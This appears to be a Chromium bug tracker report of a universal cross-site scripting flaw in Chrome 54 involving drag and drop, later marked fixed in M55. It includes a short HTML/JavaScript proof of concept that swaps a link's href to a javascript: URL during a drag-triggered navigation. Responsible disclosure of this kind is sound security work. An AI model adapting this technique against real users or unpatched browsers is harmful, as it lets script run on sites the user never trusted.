Issue metadata
Sign in to add a comment
|
Security: Chrome UXSS with Drag&Drop
Reported by
xis...@gmail.com,
Oct 31 2016
|
||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Chrome UXSS with Drag&Drop
VERSION
Chrome Version: 54.0.2840.71 (64-bit)+[Stable]
Operating System: [MAC OS 10.12.1, Windows 7&10]
REPRODUCTION CASE
Drag and drop links to the current TAB.
POC:
<script>
document.addEventListener("dragstart", function() {
location='http://www.google.com';
});
function ee(){
document.getElementById('bb').setAttribute('href', 'javascript:alert(document.domain)');
}
</script>
<a id='bb' onmousedown="ee()" href="http://www.google.com/">www.google.com</a>
,
Nov 1 2016
I have give an attack scenario In my video attachment xss.mov. When a user opens a new page with a drag and drop link to the current TAB, the location to the target site at the start of the drag and drop, while the user Drag and drop the JavaScript will be executed on the target site. The whole process of drag and drop is very short, users are difficult to detect. demo:http://xisigr.com/test/uxss/chrome/atOgsfyyUOSDF9.html
,
Nov 7 2016
I believe this was fixed in M55 via Issue 639750 .
,
Nov 8 2016
If this still repro's with >=M55, please re-file. Thanks.
,
Nov 8 2016
,
Feb 14 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by ta...@google.com
, Oct 31 2016